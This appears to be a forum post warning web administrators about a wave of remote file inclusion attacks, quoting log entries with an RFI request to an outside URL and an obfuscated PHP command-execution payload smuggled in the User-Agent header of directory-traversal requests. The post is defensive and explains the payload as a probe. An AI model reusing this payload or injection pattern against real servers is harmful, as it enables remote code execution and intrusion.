It seems there is a new wave of RFI attacks circulating. Be sure to check your logs and keep an eye out for something similar to the following. This is just a sample; I am still doing some research and testing .htaccess modifications, but wanted to give a little heads-up to anyone interested.
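The hosts, domains, and IPs will most likely vary. Notice the agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank] which is not something we see very often. The first entry is a plain remote-include attempt (a URL passed in the error parameter). The second and third are a different pattern: a directory-traversal request against HTMLSax3.php with obfuscated PHP placed in the Agent field. The function names visible in that PHP (exec, shell_exec, system, passthru) show it is trying to run a shell command, and the command at the end appears to decode to nothing more than an echo of a marker string, so this looks like a probe for whether the header gets executed. A 200 on those requests does not by itself mean the code ran; check what the 631-byte responses actually contained.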
Host: firestarter.dermichi.com
*
/errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i???
Http Code: 404 Date: Sep 19 19:19:16 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]
*
//plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../.
Http Code: 200 Date: Sep 19 19:19:17 Http Version: HTTP/1.1 Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\;
$x10=\\\x66\\x72ea\\x64\;
$x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\;
$x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\;
$x13=\\\152\\157\\x69\\156\;
$x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\;
$x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\;
$x16=\\\x6fb_st\\x61\\x72\\164\;
$x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\;
$x19=\p\\157\\160e\\x6e\;
$x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\;
$x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global
$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
$x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c =
$x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b);
}elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15();
}elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15();
}elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\;
while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} }
return $x0c;}echo
x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>
*
//plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../..
Http Code: 200 Date: Sep 19 19:19:18 Http Version: HTTP/1.1 Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\;
$x10=\\\x66\\x72ea\\x64\;
$x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\;
$x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\;
$x13=\\\152\\157\\x69\\156\;
$x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\;
$x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\;
$x16=\\\x6fb_st\\x61\\x72\\164\;
$x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\;
$x19=\p\\157\\160e\\x6e\;
$x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\;
$x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global
$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
$x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c =
$x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b);
}elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15();
}elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15();
}elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\;
while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} }
return $x0c;}echo
x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>
gameutopia